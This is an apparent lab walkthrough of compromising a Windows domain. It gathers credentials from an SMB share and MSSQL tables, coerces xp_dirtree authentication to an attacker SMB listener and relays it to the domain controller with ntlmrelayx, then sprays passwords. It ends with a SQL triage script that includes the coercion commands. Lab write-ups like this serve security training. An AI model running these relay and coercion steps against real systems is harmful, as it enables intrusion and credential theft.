## Initial Network Scan

- **Domain:** `reflection.vl`
- **Machines**
  - DC01
  - MS01
  - There's a third which I cannot connect to directly??
    - Is likely reachable from MS01

## Remote Service Enumeration

### `DC01`

- SMB - 445
- [[MSSQL]]

### `MS01`

- SMB
  - null session -> permitted
    - shares -> denied
  - `guest` -> permitted
    - shares -> permitted
      - `staging` -> `READ`
- [[MSSQL]] - 1433
- [[WinRM - 5986 HTTP]]
- MS Terminal Services - 3389

## Accessing `staging` share as `guest`

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54]
╰─> smbclient //$RHOST/staging -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  7 17:42:48 2023
  ..                                  D        0  Wed Jun  7 17:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 11:21:49 2023

                6261245 blocks of size 4096. 1169804 blocks available
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54]
╰─> cat staging_db.conf
user=web_staging
password=Washroom510
db=staging
```

A few things these credentials could be:

- Rabbit hole
- Spray credentials -> no results
- For the [[MSSQL]] database at port `1433` -> success

```sh
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54]
╰─> nxc mssql $RHOST -u ../users.txt -p ../passwords.txt --local-auth
MSSQL       10.10.149.54    1433   MS01      [*] Windows Server 2022 Build 20348 (name:MS01) (domain:reflection.vl)
MSSQL       10.10.149.54    1433   MS01      [+] MS01\web_staging:Washroom510
```

Note the `--local-auth` flag: `web_staging` is a SQL login (SQL Server authentication), not a domain account, which is why the earlier spray against SMB found nothing.

## Dumping [[MSSQL]] database

I'll initially attempt `xp_cmdshell` to see if I can get a shell:

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54]
╰─> sqlcmd -S $RHOST -U web_staging -P Washroom510
1> exec xp_cmdshell 'whoami';
2> go
Msg 229, Level 14, State 5, Server MS01\SQLEXPRESS, Procedure xp_cmdshell, Line 1
The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
1>
2> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
3> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
4> EXEC xp_cmdshell 'whoami';
5> go
Msg 15247, Level 16, State 1, Server MS01\SQLEXPRESS, Procedure sp_configure, Line 105
User does not have permission to perform this action.
```

So no love for `xp_cmdshell` :-(

The two errors say different things: `Msg 229` means `xp_cmdshell` exists but `web_staging` has no `EXECUTE` on it, and `Msg 15247` means the login lacks `ALTER SETTINGS` (held by `sysadmin` and `serveradmin`), so it cannot turn the procedure on itself either. Without one of those roles the only way forward is through whatever this login is still allowed to execute.

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54]
╰─> sqlcmd -S $RHOST -U web_staging -P Washroom510
1> select name from sys.databases;
2> go
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
staging

(5 rows affected)
1> use staging;
2> go
Changed database context to 'staging'.
1> select name from sys.tables;
2> go
name
--------------------------------------------------------------------------------------------------------------------------------
users

(1 rows affected)
1> select * from users;
2> go
id          username                                           password
----------- -------------------------------------------------- --------------------------------------------------
          1 dev01                                              Initial123
          2 dev02                                              Initial123
```

We got the following credentials:

```
dev01:Initial123
dev02:Initial123
```

We attempt to spray them:

- password spray
  - MSSQL -> no love
  - SMB -> nothing

They seem so generic and weak that they could well be a rabbit hole. Had to have a little looksie at the writeup here...

## `xp_dirtree` Relay Attack

So turns out that I'm able to run `xp_dirtree`, which enables me to make the target connect back to an SMB share running on my attacker machine. The point that makes this useful: `xp_dirtree` (like `xp_fileexist`) is executable by `public` on a default install, and when it is handed a UNC path it is the SQL Server *service process* that opens the share, so the outbound NTLM authentication is performed by the Windows account the engine runs as, not by the low-privileged SQL login we hold.

The share is set up in the following manner:

```sh
# on attacker machine
smbserver.py -ip $(get-ip tun1) -smb2support share .
```

We then run the `xp_dirtree` command in [[MSSQL]], which makes the underlying OS reach out to our SMB share and authenticate with NTLMv2 (the original note had `10.8.6.6.67` here; the captured blob below carries the target name `cifs/10.8.6.67`, so that is the address actually used):

```sql
-- inside the sqlcmd shell
exec xp_dirtree '\\10.8.6.67\share\',1,1;
go
```

Upon execution the SMB server logs the NTLMv2 challenge-response:

```
[*] Incoming connection (10.10.156.230,61367)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:1290bff29b760499b4dc77f46d510417:01010000000000008042bfe28abadb0152ff0a3627a3104f000000000100100063004400670044007a007000760066000300100063004400670044007a007000760066000200100063004e0044006a0048007300730072000400100063004e0044006a004800730073007200070008008042bfe28abadb010600040002000000080030003000000000000000000000000030000035a8d85f3dca87eb172b9249a71c181ac0efeaf744d39cd6984735023f9ec8cd0a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0036002e00360037000000000000000000
```

The account that authenticated is `REFLECTION\svc_web_staging`, the domain service account running the SQL Server instance on MS01. Two things are worth being precise about with what we have. First, this is an NTLMv2 challenge-response, not an NT hash: it cannot be passed-the-hash, only cracked offline (hashcat mode 5600, note the fixed `aaaaaaaaaaaaaaaa` server challenge smbserver.py hands out) or relayed while the client is still talking to us. Second, relaying to SMB only succeeds if the target does not require SMB signing; a domain controller requires it by default, so the fact that the relay below works means DC01 has it turned off. Check before re-triggering the coercion, since `nxc smb $DC01_IP` reports `signing:False` when it is.

This time around we'll run `ntlmrelayx` and relay the authentication to the `DC01` machine (`-i` asks it to open an interactive SMB client on the relayed session instead of dumping SAM):

```sh
ntlmrelayx.py --no-http-server -smb2support -t $DC01_IP -i
```

We re-run the `xp_dirtree` commands to re-trigger authentication. This makes our `ntlmrelayx` session yield the following:

```
[*] Servers started, waiting for connections
[*] Setting up RAW Server on port 6666
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.156.230, attacking target smb://10.10.156.229
[*] Authenticating against smb://10.10.156.229 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] All targets processed!
```

We can now leverage netcat to connect to the interactive SMB client shell which was spawned:

```sh
nc 127.0.0.1 11000
```

```
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 17:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 17:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 11:24:39 2023 prod_db.conf
# get prod_db.conf
```

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection]-[]
╰─> cat prod_db.conf
user=web_prod
password=Tribesman201
db=prod#
```

Okay that was a freaking mouthful... Let's attempt to spray those around:

- SMB -> nada
- [[MSSQL]]
  - `--local-auth`
    - We get a hit for `web_prod:Tribesman201` on `DC01`

## `DC01` [[MSSQL]] As `web_prod`

Same pattern as on MS01: `xp_cmdshell` is denied, so we go straight to the databases.

```
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection]-[]
╰─> sqlcmd -S $DC01_IP -U web_prod -P Tribesman201
1> exec xp_cmdshell 'whoami';
2> go
Msg 229, Level 14, State 5, Server DC01\SQLEXPRESS, Procedure xp_cmdshell, Line 1
The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
1> select name from sys.databases;
2> go
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
prod

(5 rows affected)
1> use prod;
2> go
Changed database context to 'prod'.
1> select name from sys.tables;
2> go
name
--------------------------------------------------------------------------------------------------------------------------------
users

(1 rows affected)
1> select * from users;
2> go
id          name                                               password
----------- -------------------------------------------------- --------------------------------------------------
          1 abbie.smith                                        CMe1x+nlRaaWEw
          2 dorothy.rose                                       hC_fny3OK9glSJ
```

So once again we get some credz:

- `abbie.smith:CMe1x+nlRaaWEw`
- `dorothy.rose:hC_fny3OK9glSJ`

I'll attempt to spray them:

- SMB ->
  - `abbie.smith:CMe1x+nlRaaWEw` on `DC01` and `MS01`
  - `dorothy.rose:hC_fny3OK9glSJ` on `DC01` and `MS01`
- MSSQL Windows Auth -> Success
  - `abbie.smith:CMe1x+nlRaaWEw` on `DC01` and `MS01`
  - `dorothy.rose:hC_fny3OK9glSJ` on `DC01` and `MS01`
- `WinRM` -> no love
- `RDP` -> yeeeeiz
  - `dorothy.rose:hC_fny3OK9glSJ` on `DC01` and `MS01`
  - `abbie.smith:CMe1x+nlRaaWEw` on `DC01` and `MS01`

Seems we got us some real user accounts here <3. We'll go ahead and connect as each user, enumerate, rinse and repeat.

## Authenticated External Access - `dorothy.rose`

`dorothy.rose:hC_fny3OK9glSJ`

Let's do some bloodhound fuckery and see what we got. (`$USER` and `$PASS` are set to the domain credentials first; in most shells `$USER` otherwise expands to the local login name.)

```sh
╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/dorothy.rose]-[]
╰─> bloodhound-ce-python -u $USER -p $PASS -d reflection.vl -ns $DC01_IP --dns-tcp -c all
```

## `DC01` Via RDP As `dorothy.rose` / `abbie.smith`

```sh
nxc rdp $DC01_IP -u 'dorothy.rose' -p 'hC_fny3OK9glSJ'
```

```sh
xfreerdp /u:dorothy.rose /p:hC_fny3OK9glSJ /v:10.10.209.101
xfreerdp /u:abbie.smith /p:CMe1x+nlRaaWEw /v:10.10.209.101
```
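The triage I would run right after the `xp_cmdshell` denials above (as `web_staging` on MS01 and as `web_prod` on DC01), before going looking for a writeup. This is an added example and not part of the original notes: it checks role membership, the login's effective server permissions, `EXECUTE` on the extended procedures that matter, impersonation grants and linked servers, and finishes with the same UNC coercion that produced the capture in the `xp_dirtree` section. Assumptions: the attacker SMB listener sits at `10.8.6.67` as in the notes, and the script is fed to `sqlcmd` with `-i`; the last query needs `VIEW SERVER STATE` and will simply error for a login that lacks it.

```sql
-- Added example (not from the original notes): post-login triage for a low-privileged MSSQL login.
-- Usage: sqlcmd -S <host> -U web_staging -P Washroom510 -i triage.sql
USE master;
GO

-- 1. Who am I, and does the login already hold a server role that makes the rest moot?
--    serveradmin is enough for sp_configure, sysadmin is enough for everything.
SELECT SYSTEM_USER                       AS login_name,
       IS_SRVROLEMEMBER('sysadmin')      AS is_sysadmin,
       IS_SRVROLEMEMBER('serveradmin')   AS is_serveradmin;
GO

-- 2. Effective server-level permissions. ALTER SETTINGS is what sp_configure demanded;
--    Msg 15247 in the notes means it is missing from this list.
SELECT permission_name
FROM   fn_my_permissions(NULL, 'SERVER');
GO

-- 3. EXECUTE rights on the extended procedures that matter (1 = yes, 0 = no, NULL = not found).
--    xp_dirtree and xp_fileexist are executable by public on a default install, which is
--    why the coercion works while xp_cmdshell is denied.
SELECT 'xp_cmdshell'  AS proc_name, HAS_PERMS_BY_NAME('master.sys.xp_cmdshell',  'OBJECT', 'EXECUTE') AS can_exec
UNION ALL
SELECT 'xp_dirtree',   HAS_PERMS_BY_NAME('master.sys.xp_dirtree',   'OBJECT', 'EXECUTE')
UNION ALL
SELECT 'xp_fileexist', HAS_PERMS_BY_NAME('master.sys.xp_fileexist', 'OBJECT', 'EXECUTE')
UNION ALL
SELECT 'xp_subdirs',   HAS_PERMS_BY_NAME('master.sys.xp_subdirs',   'OBJECT', 'EXECUTE');
GO

-- 4. Impersonation grants: IMPERSONATE on sa or on any sysadmin login is a direct route to
--    EXECUTE AS LOGIN = 'sa' and from there to xp_cmdshell.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate
FROM   sys.server_permissions AS p
JOIN   sys.server_principals  AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN   sys.server_principals  AS target  ON p.major_id             = target.principal_id
WHERE  p.permission_name = 'IMPERSONATE'
AND    p.state = 'G';
GO

-- 5. Linked servers: a query sent through a link runs with whatever credential the link
--    was configured with, which is often more privileged than the login we hold.
EXEC sp_linkedservers;
GO

-- 6. Which Windows account runs the engine? That account, not the SQL login, is the one
--    whose NTLM authentication the coercion below hands to our listener.
--    Requires VIEW SERVER STATE; expect an error rather than a row set without it.
SELECT servicename, service_account
FROM   sys.dm_server_services;
GO

-- 7. The coercion itself. The SQL Server process opens the UNC path and authenticates to it
--    with its own Windows account; 10.8.6.67 is the attacker listener from the notes.
EXEC master.sys.xp_dirtree '\\10.8.6.67\share\', 1, 1;
GO

-- 8. Fallback trigger if xp_dirtree has been revoked but xp_fileexist has not.
EXEC master.sys.xp_fileexist '\\10.8.6.67\share\probe.txt';
GO
```

Step 3 is the one that would have short-circuited the detour to the writeup: a `1` next to `xp_dirtree` with a `0` next to `xp_cmdshell` is exactly the situation on both boxes here. Steps 4 and 5 returned nothing of interest on this lab as far as the notes show, but they are cheap and are the usual escalation routes on instances where the coercion is blocked (egress filtering, or a service running as a virtual account with no domain identity to relay).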